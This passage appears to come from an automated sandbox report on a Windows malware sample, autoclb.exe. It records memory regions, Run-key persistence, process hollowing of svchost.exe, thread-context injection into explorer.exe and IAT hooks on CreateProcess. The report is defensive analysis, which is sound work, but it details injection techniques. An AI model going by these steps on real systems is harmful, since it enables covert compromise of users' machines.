private_0x0000000001db0000 0x01db0000 0x01eaffff Private Memory rw True False False -
private_0x0000000001eb0000 0x01eb0000 0x023dffff Private Memory rw True False False -
sortdefault.nls 0x023e0000 0x02716fff Memory Mapped File r False False False -
private_0x0000000002720000 0x02720000 0x028e1fff Private Memory rw True False False -
pagefile_0x0000000002720000 0x02720000 0x02852fff Pagefile Backed Memory rwx True False False -
private_0x0000000002860000 0x02860000 0x02a21fff Private Memory rw True False False -
wow64.dll 0x61eb0000 0x61efefff Memory Mapped File rwx False False False -
wow64cpu.dll 0x61f00000 0x61f07fff Memory Mapped File rwx False False False -
wow64win.dll 0x61f10000 0x61f82fff Memory Mapped File rwx False False False -
devobj.dll 0x74a20000 0x74a40fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74a50000 0x74aa8fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74ab0000 0x74ab9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74ac0000 0x74addfff Memory Mapped File rwx False False False -
sechost.dll 0x74ae0000 0x74b22fff Memory Mapped File rwx False False False -
combase.dll 0x74bb0000 0x74d69fff Memory Mapped File rwx False False False -
kernel32.dll 0x74d70000 0x74e5ffff Memory Mapped File rwx False False False -
setupapi.dll 0x74e60000 0x75004fff Memory Mapped File rwx False False False -
crypt32.dll 0x75010000 0x75184fff Memory Mapped File rwx False False False -
shlwapi.dll 0x75190000 0x751d3fff Memory Mapped File rwx False False False -
imm32.dll 0x751e0000 0x7520afff Memory Mapped File rwx False False False -
shell32.dll 0x75210000 0x765cefff Memory Mapped File rwx False False False -
shcore.dll 0x765d0000 0x7665cfff Memory Mapped File rwx False False False -
user32.dll 0x766f0000 0x7682ffff Memory Mapped File rwx False False False -
msctf.dll 0x76890000 0x769affff Memory Mapped File rwx False False False -
windows.storage.dll 0x76a50000 0x76f2cfff Memory Mapped File rwx False False False -
msasn1.dll 0x76f30000 0x76f3dfff Memory Mapped File rwx False False False -
powrprof.dll 0x770a0000 0x770e3fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x770f0000 0x7719bfff Memory Mapped File rwx False False False -
wintrust.dll 0x771a0000 0x771e1fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77200000 0x7720bfff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x77210000 0x77245fff Memory Mapped File rwx False False False -
ole32.dll 0x77250000 0x77339fff Memory Mapped File rwx False False False -
profapi.dll 0x77340000 0x7734efff Memory Mapped File rwx False False False -
gdi32.dll 0x773b0000 0x774fcfff Memory Mapped File rwx False False False -
advapi32.dll 0x77510000 0x7758afff Memory Mapped File rwx False False False -
msvcrt.dll 0x77600000 0x776bdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x77830000 0x779a5fff Memory Mapped File rwx False False False -
ntdll.dll 0x779b0000 0x77b28fff Memory Mapped File rwx False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff977f2ffff Private Memory r True False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
private_0x00007ff9780f2000 0x7ff9780f2000 0x7ffffffeffff Private Memory r True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count
Modify Memory #9: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x4f8 address = 0x400000, size = 462848 True 1
Modify Memory #9: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x4f8 address = 0x7ffde008, size = 4 True 1
Modify Control Flow #9: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x4f8 os_tid = 0x710, address = 0x77a1aef0 True 1
Host Behavior
File (8)
Operation Filename Additional Information Success Count
Create C:\Users\CIIHMN~1\AppData\Local\Temp\98F9CE91 desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Windows\system32\c_1252.nls desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 3
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw - False 1
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Registry (12)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Open Key HKEY_USERS - True 1
Open Key HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = InstallDate, data = 65 True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = cabilipc, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, type = REG_SZ True 1
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = 0, type = REG_SZ True 1
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming, type = REG_SZ True 1
Enumerate Keys HKEY_USERS - True 1
Enumerate Keys HKEY_USERS - True 1
Enumerate Keys HKEY_USERS - True 1
Enumerate Keys HKEY_USERS - True 1
Process (3)
Operation Process Additional Information Success Count
Create C:\Windows\system32\svchost.exe os_pid = 0x198, creation_flags = CREATE_SUSPENDED, CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE True 1
Open c:\windows\explorer.exe desired_access = PROCESS_QUERY_INFORMATION True 1
Open c:\windows\explorer.exe desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE True 1
Thread (6)
Operation Process Additional Information Success Count
Suspend c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x2d0 True 1
Get Context c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x2d0 True 2
Set Context c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x2d0 True 1
Resume c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x2d0 True 2
Memory (4)
Operation Process Additional Information Success Count
Protect C:\Windows\system32\svchost.exe address = 0x7ff7ce3a3440, protection = PAGE_EXECUTE_READWRITE, size = 32175608 True 1
Protect C:\Windows\system32\svchost.exe address = 0x7ff7ce3a3000, protection = PAGE_EXECUTE_READ, size = 32175608 True 1
Write C:\Windows\system32\svchost.exe address = 0x950000, size = 792 True 1
Write C:\Windows\system32\svchost.exe address = 0x7ff7ce3a3440, size = 4 True 1
Module (45)
Operation Module Additional Information Success Count
Get Handle c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe base_address = 0x400000 True 2
Get Handle c:\windows\syswow64\user32.dll base_address = 0x766f0000 True 2
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x779b0000 True 17
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74d70000 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x74d896e0 True 1
Get Address c:\windows\syswow64\user32.dll function = GetWindowThreadProcessId, address_out = 0x7670ba70 True 2
Get Address c:\windows\syswow64\kernel32.dll function = Wow64EnableWow64FsRedirection, address_out = 0x74dab6a0 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwWow64QueryInformationProcess64, address_out = 0x77a1a840 True 15
Get Address c:\windows\syswow64\ntdll.dll function = ZwWow64ReadVirtualMemory64, address_out = 0x77a1a860 True 1
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 32175576 True 1
Map - process_name = c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2720000 True 1
Map - process_name = C:\Windows\system32\svchost.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x810000 True 1
Window (2)
Operation Window Name Additional Information Success Count
Find - class_name = ProgMan True 2
System (15)
Operation Additional Information Success Count
Get Computer Name result_out = LHNIWSJ True 1
Sleep duration = 500 milliseconds (0.500 seconds) True 10
Sleep duration = 100 milliseconds (0.100 seconds) True 1
Get Time type = Ticks, time = 102515 True 1
Get Info type = Operating System True 1
Get Info type = Operating System False 1
Process #11: svchost.exe
Information Value
ID #11
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:26, Reason: Child Process
Unmonitor End Time: 00:03:29, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
Information Value
PID 0x198
Parent PID 0x51c (c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x1C4
0xB44
0xB28
0xB34
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000810000 0x00810000 0x00942fff Pagefile Backed Memory rwx True False False -
private_0x0000000000950000 0x00950000 0x00950fff Private Memory rwx True False False -
private_0x000000007f67f000 0x7f67f000 0x7f67ffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000b093810000 0xb093810000 0xb09382ffff Private Memory rw True False False -
pagefile_0x000000b093810000 0xb093810000 0xb09381ffff Pagefile Backed Memory rw True False False -
svchost.exe.mui 0xb093820000 0xb093820fff Memory Mapped File r False False False -
pagefile_0x000000b093830000 0xb093830000 0xb093843fff Pagefile Backed Memory r True False False -
private_0x000000b093850000 0xb093850000 0xb0938cffff Private Memory rw True False False -
pagefile_0x000000b0938d0000 0xb0938d0000 0xb0938d3fff Pagefile Backed Memory r True False False -
pagefile_0x000000b0938e0000 0xb0938e0000 0xb0938e0fff Pagefile Backed Memory r True False False -
private_0x000000b0938f0000 0xb0938f0000 0xb0938f1fff Private Memory rw True False False -
locale.nls 0xb093900000 0xb0939bdfff Memory Mapped File r False False False -
imm32.dll 0xb0939c0000 0xb0939f3fff Memory Mapped File r False False False -
private_0x000000b0939c0000 0xb0939c0000 0xb0939c0fff Private Memory rw True False False -
private_0x000000b0939d0000 0xb0939d0000 0xb0939d0fff Private Memory rw True False False -
msvfw32.dll.mui 0xb0939e0000 0xb0939e1fff Memory Mapped File r False False False -
private_0x000000b093a00000 0xb093a00000 0xb093a06fff Private Memory rw True False False -
private_0x000000b093a10000 0xb093a10000 0xb093a8ffff Private Memory rw True False False -
private_0x000000b093b00000 0xb093b00000 0xb093bfffff Private Memory rw True False False -
private_0x000000b093c00000 0xb093c00000 0xb093cacfff Private Memory rw True False False -
private_0x000000b093cb0000 0xb093cb0000 0xb093eaffff Private Memory rw True False False -
private_0x000000b093d00000 0xb093d00000 0xb093dfffff Private Memory rw True False False -
pagefile_0x000000b093e00000 0xb093e00000 0xb093f87fff Pagefile Backed Memory r True False False -
pagefile_0x000000b093f90000 0xb093f90000 0xb094110fff Pagefile Backed Memory r True False False -
pagefile_0x000000b094120000 0xb094120000 0xb09551ffff Pagefile Backed Memory r True False False -
private_0x000000b095520000 0xb095520000 0xb0956ccfff Private Memory rw True False False -
oleaut32.dll 0xb095520000 0xb0955dcfff Memory Mapped File r False False False -
pagefile_0x000000b095520000 0xb095520000 0xb095652fff Pagefile Backed Memory rwx True False False -
private_0x000000b0956c0000 0xb0956c0000 0xb0956ccfff Private Memory rw True False False -
private_0x000000b0956d0000 0xb0956d0000 0xb0958cffff Private Memory rw True False False -
private_0x000000b095700000 0xb095700000 0xb0957fffff Private Memory rw True False False -
private_0x000000b095800000 0xb095800000 0xb0959acfff Private Memory rw True False False -
private_0x000000b0959b0000 0xb0959b0000 0xb095baffff Private Memory rw True False False -
private_0x000000b095a00000 0xb095a00000 0xb095afffff Private Memory rw True False False -
private_0x000000b095b00000 0xb095b00000 0xb095cfffff Private Memory rw True False False -
private_0x000000b095b00000 0xb095b00000 0xb095bfffff Private Memory rw True False False -
private_0x000000b095c00000 0xb095c00000 0xb095dfffff Private Memory rw True False False -
private_0x000000b095c00000 0xb095c00000 0xb095cfffff Private Memory rw True False False -
private_0x000000b095d00000 0xb095d00000 0xb095efffff Private Memory rw True False False -
private_0x000000b095d00000 0xb095d00000 0xb095dfffff Private Memory rw True False False -
sortdefault.nls 0xb095e00000 0xb096136fff Memory Mapped File r False False False -
pagefile_0x00007df5ffe50000 0x7df5ffe50000 0x7ff5ffe4ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff7ce270000 0x7ff7ce270000 0x7ff7ce36ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff7ce370000 0x7ff7ce370000 0x7ff7ce392fff Pagefile Backed Memory r True False False -
private_0x00007ff7ce39b000 0x7ff7ce39b000 0x7ff7ce39cfff Private Memory rw True False False -
private_0x00007ff7ce39d000 0x7ff7ce39d000 0x7ff7ce39dfff Private Memory rw True False False -
private_0x00007ff7ce39e000 0x7ff7ce39e000 0x7ff7ce39ffff Private Memory rw True False False -
svchost.exe 0x7ff7ce3a0000 0x7ff7ce3acfff Memory Mapped File rwx False False False -
winmmbase.dll 0x7ff968780000 0x7ff9687abfff Memory Mapped File rwx False False False -
winmm.dll 0x7ff9687b0000 0x7ff9687d2fff Memory Mapped File rwx False False False -
comctl32.dll 0x7ff96c9b0000 0x7ff96ca59fff Memory Mapped File rwx False False False -
msvfw32.dll 0x7ff96f280000 0x7ff96f2a8fff Memory Mapped File rwx False False False -
msacm32.dll 0x7ff972240000 0x7ff97225bfff Memory Mapped File rwx False False False -
avifil32.dll 0x7ff972350000 0x7ff97236ffff Memory Mapped File rwx False False False -
devobj.dll 0x7ff973450000 0x7ff973476fff Memory Mapped File rwx False False False -
sspicli.dll 0x7ff974520000 0x7ff97454bfff Memory Mapped File rwx False False False -
profapi.dll 0x7ff974980000 0x7ff974992fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x7ff9749a0000 0x7ff9749aefff Memory Mapped File rwx False False False -
powrprof.dll 0x7ff9749b0000 0x7ff9749f9fff Memory Mapped File rwx False False False -
windows.storage.dll 0x7ff974c30000 0x7ff975257fff Memory Mapped File rwx False False False -
shcore.dll 0x7ff975310000 0x7ff9753c2fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x7ff9755b0000 0x7ff9755f3fff Memory Mapped File rwx False False False -
user32.dll 0x7ff9757b0000 0x7ff9758fdfff Memory Mapped File rwx False False False -
shell32.dll 0x7ff975900000 0x7ff976e24fff Memory Mapped File rwx False False False -
advapi32.dll 0x7ff976f80000 0x7ff977025fff Memory Mapped File rwx False False False -
msctf.dll 0x7ff977200000 0x7ff97735bfff Memory Mapped File rwx False False False -
shlwapi.dll 0x7ff977360000 0x7ff9773b0fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
gdi32.dll 0x7ff9774c0000 0x7ff977644fff Memory Mapped File rwx False False False -
sechost.dll 0x7ff9776c0000 0x7ff97771afff Memory Mapped File rwx False False False -
imm32.dll 0x7ff977720000 0x7ff977755fff Memory Mapped File rwx False False False -
psapi.dll 0x7ff977820000 0x7ff977827fff Memory Mapped File rwx False False False -
combase.dll 0x7ff977830000 0x7ff977aabfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ole32.dll 0x7ff977b60000 0x7ff977ca0fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7ff977df0000 0x7ff977f15fff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Hook Information
»
Type Installer Target Size Information Actions
Code pagefile_0x0000000000810000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x1fe 8 bytes -
Code pagefile_0x0000000000810000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x1f8 2 bytes -
Code pagefile_0x0000000000810000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x20c 8 bytes -
Code pagefile_0x0000000000810000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x206 2 bytes -
Code pagefile_0x0000000000810000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x21a 8 bytes -
Code pagefile_0x0000000000810000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x214 2 bytes -
Code pagefile_0x0000000000810000:+0x28dce advapi32.dll:Wow64RedirectKeyPathInternal+0x3fa 8 bytes -
Code pagefile_0x0000000000810000:+0x28dd2 advapi32.dll:Wow64RedirectKeyPathInternal+0x3f4 2 bytes -
IAT pagefile_0x0000000000810000:+0x289b5 230. entry of user32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
IAT pagefile_0x0000000000810000:+0x289b5 517. entry of ole32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
IAT pagefile_0x0000000000810000:+0x289b5 638. entry of shell32.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000000810000:+0x318ec
IAT pagefile_0x0000000000810000:+0x289b5 631. entry of shell32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
IAT pagefile_0x0000000000810000:+0x289b5 236. entry of windows.storage.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
IAT pagefile_0x0000000000810000:+0x289b5 215. entry of windows.storage.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000000810000:+0x318ec
IAT pagefile_0x0000000000810000:+0x289b5 261. entry of msctf.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
IAT pagefile_0x0000000000810000:+0x289b5 133. entry of msvcrt.dll 4 bytes kernel32.dll:CreateProcessA+0x0 now points to pagefile_0x0000000000810000:+0x316b8
IAT pagefile_0x0000000000810000:+0x289b5 134. entry of msvcrt.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #10: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x2d0 address = 0x810000, size = 1257472 True 1
Fn
Modify Memory #10: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x2d0 address = 0x950000, size = 792 True 1
Fn
Data
Modify Control Flow #10: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x2d0 os_tid = 0x1c4, address = 0xce39d000 True 1
Fn
Modify Memory #10: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x2d0 address = 0x7ff7ce3a3440, size = 4 True 1
Fn
Data
Host Behavior
File (6)
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 3
Fn
Read C:\Windows\SYSTEM32\ntdll.dll size = 4, size_out = 4 True 3
Fn
Data
Registry (12)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Ini, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, data = 232, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductID, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = CurrentVersion, data = 54 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = InstallDate, data = 65 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Scr, type = REG_NONE False 1
Fn
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, size = 40, type = REG_BINARY True 1
Fn
Data
Process (35)
Operation Process Additional Information Success Count Logfile
Get Info c:\windows\system32\svchost.exe type = PROCESS_BASIC_INFORMATION True 34
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE True 1
Fn
Thread (7)
Operation Process Additional Information Success Count Logfile
Create c:\windows\explorer.exe proc_address = 0x7ff977f39fa0, proc_parameter = 0, flags = THREAD_CREATE_SUSPENDED True 1
Fn
Suspend c:\windows\explorer.exe os_tid = 0xb40 True 1
Fn
Get Context c:\windows\explorer.exe os_tid = 0xb40 True 2
Fn
Set Context c:\windows\explorer.exe os_tid = 0xb40 True 1
Fn
Resume c:\windows\explorer.exe os_tid = 0xb40 True 2
Fn
Memory (9)
Operation Process Additional Information Success Count Logfile
Allocate c:\windows\explorer.exe address = 0xb0938ced80, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 758389730696 True 1
Fn
Protect c:\windows\explorer.exe address = 0x7ff977f39fa0, protection = PAGE_EXECUTE_READWRITE, size = 4 True 2
Fn
Protect c:\windows\explorer.exe address = 0x7ff977f39fa0, protection = PAGE_EXECUTE_READ, size = 4 True 2
Fn
Read c:\windows\explorer.exe address = 0x7ff977f39fa0, size = 4 True 1
Fn
Data
Write c:\windows\explorer.exe address = 0x7ff977f39fa0, size = 4 True 2
Fn
Data
Write c:\windows\explorer.exe address = 0x4760000, size = 792 True 1
Fn
Data
Module (227)
Operation Module Additional Information Success Count Logfile
Load ntdll.dll base_address = 0x0 True 1
Fn
Load KERNEL32.dll base_address = 0x0 True 1
Fn
Load AVIFIL32.dll base_address = 0x0 True 1
Fn
Load ADVAPI32.dll base_address = 0x7ff976f80000 True 1
Fn
Load SHLWAPI.dll base_address = 0x7ff977360000 True 1
Fn
Load USER32.dll base_address = 0x7ff9757b0000 True 1
Fn
Load PSAPI.DLL base_address = 0x7ff977820000 True 1
Fn
Get Handle c:\windows\system32\svchost.exe base_address = 0x7ff7ce3a0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 5
Fn
Get Handle c:\windows\system32\ntdll.dll base_address = 0x7ff977f30000 True 4
Fn
Get Handle c:\windows\system32\kernelbase.dll base_address = 0x7ff9753d0000 True 1
Fn
Get Handle c:\windows\system32\advapi32.dll base_address = 0x7ff976f80000 True 2
Fn
Get Filename AVIFIL32.dll process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\system32\svchost.exe, size = 260 True 2
Fn
Get Filename c:\windows\system32\ntdll.dll process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 True 3
Fn
Get Address - function = NtCreateSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = NtUnmapViewOfSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = NtMapViewOfSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwOpenProcessToken, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwClose, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwQueryInformationToken, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwOpenProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = NtQuerySystemInformation, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlNtStatusToDosError, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwQueryInformationProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlImageDirectoryEntryToData, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = _wcsupr, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = _strupr, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = memmove, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = bsearch, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = _vsnwprintf, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = _strlwr, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = atoi, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = strstr, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = wcscpy, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwQueryKey, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlUpcaseUnicodeString, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlFreeUnicodeString, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = sprintf, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = _snprintf, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = memset, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = memcpy, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = strcpy, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlAdjustPrivilege, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = mbstowcs, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlImageNtHeader, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = memcmp, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = __C_specific_handler, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = __chkstk, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetLocalTime, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = VirtualQueryEx, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateRemoteThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetModuleFileNameW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetVersion, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SetEndOfFile, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RemoveDirectoryW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
